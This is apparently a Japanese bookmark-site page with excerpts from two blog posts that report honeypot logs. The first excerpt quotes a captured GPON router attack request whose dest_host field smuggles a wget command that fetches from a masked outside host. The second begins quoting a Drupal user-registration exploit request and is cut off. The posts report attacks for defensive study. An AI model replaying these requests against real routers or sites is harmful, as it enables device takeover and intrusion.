サクサク読めて、アプリ限定の機能も多数!
トップへ戻る
大谷翔平
saito.hatenadiary.com
5月6日ごろから急激にきている攻撃ログを発見したので、ご紹介します。 具体的なアクセスは下記のようなものです。 POST /GponForm/diag_Form?images/ HTTP/1.1 Cache-Control: no-cache Connection: keep-alive Content-Length: 119 Content-Type: text/plain Host: XXX.XXX.XXX.XXX:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO - http://YYY.YYY.YYY.YYY/gpon.php?port=80&ipv=0 /GponForm/
先日より僕のハニーポットが動作しているのですが、さっそく怪しいアクセスをキャッチしたので、紹介します。 saito.hatenadiary.com 実際の僕のハニーポットで取得できたログはこんな感じです。 一応あれかなと思いアクセス元のIPアドレスは伏せてあります。 今回キャッチしたアクセスログはこんな内容です。 POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 Cache-Control: no-cache Connection: keep-alive Content-Length: 170 Content-Type: application/x-www-form-urlencoded Host: XXX.XXX.XXX.XX
このページを最初にブックマークしてみませんか?
『saito.hatenadiary.com』の新着エントリーを見る
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く